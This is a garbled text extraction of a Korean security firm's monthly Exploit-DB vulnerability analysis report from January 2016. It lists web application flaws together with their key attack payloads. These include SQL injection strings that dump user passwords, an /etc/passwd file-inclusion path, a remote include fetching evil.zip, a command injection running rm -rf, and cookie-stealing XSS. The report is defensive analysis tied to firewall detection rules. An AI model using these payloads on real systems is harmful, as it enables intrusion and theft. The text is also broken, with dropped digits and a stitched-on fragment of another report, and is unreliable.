** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

Size: px

Start display at page:

Download "** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름"

재숙 방
6 years ago
Views:

1 EDB 분석보고서 (016.01) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection 공격들은공격난이도면에서는단순히공격의성공여부를묻는쿼리를사용하여공격이이루어지는난이도가낮은공격들이대부분이었으나, 그위험도면에서는모두높은공격들이었습니다. 해당취약점이발견된소프트웨어를사용하는관리자는대모듈및플러그인에입력값검증을좀더엄격하게하는보안패치및시큐어코딩을실시하여 SQL Injection 공격에노출되지않도록주의하여야겠습니다. SQL Injection 이외에최근들어 Code Injection 과관련한취약점이주기적으로나타나고있습니다. PHP Code Injection 은 SQL Injection 과 Command Injection 에비해대적으로위험도가낮은취약점에속하지만여전히수많은웹사이트가 PHP 로이루어져있어 PHP 해당사이트는 Code Injection 에쉽게노출될수있습니다. PHP Code Injection 역시 SQL Injection 과마찬가지로사용자의입력값을엄격하게검증하여악의적인코드가실행되지않도록주의하여야겠습니다. 1. 취약점별보고개수취약점 보고개수 LFI 1 Command Injection 1 Code Injection 1 RFI XSS 8 SQL Injection 15 총합계 취약점별보고개수 LFI Command Injection Code Injection RFI XSS SQL Injection. 위험도별분류 위험도 보고개수 백분율 % % 합계 % 위험도별분류 공격난이도별현황공격난이도 보고개수 백분율 7.1% 1.9% 하 78.57% 총합계 % 공격난이도별현황 하. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 3 CMS Forum Ramui webblog SeaWell Networks 1 총합계 8 주요소프트웨어별취약점발생현황 1 CMS Forum Ramui webblog 3 SeaWell Networks

2 ** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

3 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WAPPLES 정책 SQL Injection 하 SQL Injection 하 SQL Injection 하 SQL Injection 하 XSS 하 software_add_license.php SQL delete_system.php SQL list_viewdef_software_for_syst em.php SQL system_export.php SQL EDB 분석보고서 (016.01) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 logincheck.php XSS 취약점 /software_add_license.php?id=1%0and%01=1-- /delete_system.php?pc=1%0and%01=1-- /list_viewdef_software_for_system.php?pc=1%0and% 01=1-- /system_export.php?pc=1%0and%01=1-- POST /phpipam/site/login/logincheck.php HTTP/1.1 ipamusername=<script>alert("rxss01")</script>&ipampa ssword=xxx XSS 하 logincheck.php XSS 취약점 POST /phpipam/site/login/logincheck.php HTTP/ ipamusername=<script>alert("rxss01")</script>&ipampa ssword=xxx SQL Injection 하 - manage-profile.php SQL POST /manage-profile.php HTTP/1.1 =1' and 1= SQL Injection 하 POST /registeracc.php HTTP/1.1 - registeracc.php SQL Injection 취 약점 =tester%0wics.com' or updatexml(,concat(0x7e,(version())),0) or' XSS 하 - manage-profile.php XSS POST /manage-profile.php HTTP/1.1 firstname=wics&lastname=wics& =<script>alert(doc ument.location)</script>&password=admin&confirmpass word=admin&update=update+profile XSS 하 POST /registeracc.php HTTP/1.1 - registeracc.php XSS Injection 취 약점 firstname=wics&lastname=wics& =<script>alert(1);< /script>&password=admin&confirmpassword=admin&up date=update+profile XSS 하 POST /wps_usermeta_shortcodes.php HTTP/1.1 WP Symposium Pro Social Network Plugin wps_usermeta_shortcodes.php XSS 취약점 WP Symposium Pro Social Network Plugin 15.1 wpspro_country="><script>alert("1")</script><"

4 EDB 분석보고서 (016.01) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 WAPPLES 정책 POST /doms/discoveryqueue/kill.php HTTP/ Code Injection 하 NMS <= NMS kill.php Code <= 미탐 pids[]=echo phpinfo(); Command Injection NMS <= kill.php Command POST /doms/discoveryqueue/kill.php HTTP/1.1 NMS <= Stealth Commanding - 외부프로그램실행시도탐지 pids[]=python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be SQL Injection.xls Bitrix Module _xls_import.php SQL /bitrix/admin/_xls_import.php?del_prof_real=1&xls _profile=%7%0or%01=(select%0load_file(conc AT(CHAR(9),CHAR(9),(select%0version()),CHAR(6), CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99), CHAR(107),CHAR(101),CHAR(11),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9),CHAR(10),CHAR(11 1),CHAR(111),CHAR(98),CHAR(97),CHAR(11))))+--+.xls Bitrix Module SQL Injection.xls Bitrix Module _xls_import_step_.php SQL /admin/_xls_import_step_.php?save_profile=y&m ake_translit_code=y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(sel ect%0load_file(concat(char(9),char(9),(select% 0version()),CHAR(6),CHAR(97),CHAR(116),CHAR(116 ),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(11 ),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9 ),CHAR(10),CHAR(111),CHAR(111),CHAR(98),CHAR( 97),CHAR(11))))%9+-- +&xls_iblock_section_id=0&xls_identify=0&firstrow=0 &titlerow=0&firstcolumn=0&highestcolumn=0&xls_gl OBALS=0&sku_iblock_id=1&cml_link_code=1&xls_ibloc k_section_id_new=0.xls Bitrix Module LFI 하 SeaWell Networks Spectrum - /configure_manage.php?action=download_config&file=.. configure_manage.php LFI 취약 /../../../../../../../../etc/passwd 점 SeaWell Networks SeaWell Networks Spectrum Stealth Commanding- 사용자정의 - 대경로탐지 RFI 하 Forum index.php RFI 취약점 POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1 Forum Forum Include Injection - 파일 Include 탐지 folderpath=../&importtype=&weburl= tervista.org/evil.zip&filepath=../&uploadtheme=&imports kin=import XSS 하 Forum index.php XSS 취약점 POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1 Forum Forum fredirect="/><script>alert("xss hyp3rlinx \n\n" + document.cookie)</script> SQL Injection Booking Calendar /wordpress/wp-admin/adminajax.php?action=cpabc_appointments_check_ipn_verifica Contact Form Plugin <= admin-ajax.php SQL Injection tion&cpabc_ipncheck=1&itemnumber=(select * FROM 취약점 (SELECT(SLEEP(5)))Qmyx) Booking Calendar Contact Form Plugin <= XSS 하 WordPress Booking Calendar Contact Form <= admin.php XSS 취약점 /wpadmin/admin.php?page=cpabc_appointments&ac=st&ch s=utf- 8&ict=%%3E%3Cimg+src%3Dx+onerror%3Dalert% 81%9%3E&ics=%%3E%3Cimg+src%3Dx+onerror %3Dalert%81%9%3E&scr=1 WordPress Booking Cross Site Scripting-사 Calendar 용자정의-이미지태그 Contact Form <= SQL Injection XSS 하 RFI 하 jquery CMS. - gallery1.php SQL jquery CMS. - gallery1.php XSS 취약점 Ramui Web Hosting Directory Script.0 - connection.php RFI 취약점 /user/gallery1.php?g_name=1%7%0union%0all% 0select%01,,3,group_concat%8version%8%9% 9,5--+ /user/gallery1.php?g_name=%3cscript%3ealert%8% XSS%%9%3C/script%3E /gb/include/connection.php?root= php CMS CMS Ramui webblog jquery CMS. jquery CMS. Ramui Web Hosting Directory Script.0 Include Injection - 파일 Include 탐지

5 EDB 분석보고서 (016.01) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WAPPLES 정책 SQL Injection 하 SQL Injection Ramui Forum Script page.php SQL /gb/include/page.php?pagename=1%0and%01=1-- Ramui webblog r58 - managefiles.php SQL POST /manage-files.php?client_id=1 HTTP/1.1 status=10' and 0 union select 0,1,'0) or 1 union select 0,1,concat(user,char(3),password),3,,5,6,7,8,9 from tbl_users -- a',3,,5,6,'7 Ramui Forum Script 9.0 r SQL Injection 하 r58 - clients.php SQL POST /clients.php HTTP/1.1 r58 status=1' and 1= SQL Injection 하 r58 - rocess-zipdownload.php SQL /rocess-zip-download.php?file=1%7%0and%01=1-- %0 r SQL Injection 하 r58 - homelog.php SQL /home-log.php?action=1%7%0and%01=1--%0 r58

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross